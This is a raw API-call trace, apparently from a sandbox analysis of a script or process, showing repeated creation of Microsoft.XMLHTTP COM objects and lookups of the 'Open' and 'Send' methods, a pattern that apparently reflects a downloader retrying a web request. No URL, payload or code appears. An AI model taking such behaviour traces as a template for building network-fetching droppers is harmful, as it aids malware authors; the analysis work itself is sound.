	[0371.631] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0371.633] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0371.633] SysStringLen (param_1=0x0) returned 0x0
	[0371.633] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0371.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0371.633] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0371.633] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0371.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0371.633] ??2@YAPEAX_K@Z () returned 0x62f330
	[0371.633] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0371.633] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0371.633] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0371.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0371.633] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0371.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0371.634] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0371.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0371.636] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0371.636] SysStringLen (param_1=0x0) returned 0x0
	[0371.636] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0371.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0371.636] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0371.636] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0371.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0371.637] ??2@YAPEAX_K@Z () returned 0x62f310
	[0371.637] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0371.637] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0371.637] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0371.637] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0371.637] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0371.637] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0371.637] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0371.637] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0371.637] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0371.637] SysStringLen (param_1=0x0) returned 0x0
	[0371.637] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0371.637] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0371.637] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0371.637] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0371.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0371.638] ??2@YAPEAX_K@Z () returned 0x62f330
	[0371.638] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0371.638] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0371.638] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0371.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0371.638] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0371.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0371.638] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0371.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0371.638] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0371.638] SysStringLen (param_1=0x0) returned 0x0
	[0371.638] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0371.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0371.638] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0371.638] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0371.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0371.639] ??2@YAPEAX_K@Z () returned 0x62f310
	[0371.639] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0371.639] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0371.639] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0371.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0371.639] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0371.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0371.639] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0371.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0371.639] longjmp () 
	[0371.639] longjmp () 
	[0371.639] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0371.639] SysStringLen (param_1=0x0) returned 0x0
	[0371.639] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0371.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0371.640] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0371.640] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0371.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0371.640] ??2@YAPEAX_K@Z () returned 0x62f330
	[0371.640] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0371.640] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0371.640] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0371.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0371.640] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0371.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0371.640] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0371.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0371.640] longjmp () 
	[0371.640] longjmp () 
	[0371.641] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0371.641] SysStringLen (param_1=0x0) returned 0x0
	[0371.641] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0371.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0371.641] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0371.641] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0371.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0371.641] ??2@YAPEAX_K@Z () returned 0x62f310
	[0371.641] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0371.641] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0371.641] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0371.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0371.641] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0371.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0371.641] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0371.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0371.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0371.642] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
